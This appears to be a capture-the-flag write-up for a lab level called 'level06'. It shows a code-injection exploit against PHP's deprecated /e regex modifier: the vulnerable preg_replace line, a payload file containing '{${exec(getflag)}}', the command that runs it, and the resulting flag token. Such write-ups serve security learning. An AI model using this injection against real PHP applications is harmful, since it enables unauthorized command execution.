## Level 06

### First step

After analysing the *level06.php* file, we can see the use of the */e* regex modifier who is now deprecated due to the fact it allows us to use PHP code within regular expression.

```php
$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")"
```  

### Second step

We now know we have to create a file containing a matching pattern to get it executed by the PHP code.  
```bash
$> echo "[x {\${exec(getflag)}}]" > /tmp/test
```

Our file is created in /tmp since we have written access within.

### Final step

Let's execute the binary file passing our newly created /tmp/test.  

```bash
$> ./level06 /tmp/test
```

Which gives us:

```bash
$> ./level06 /tmp/test
PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub in /home/user/level06/level06.php(4) : regexp code on line 1
```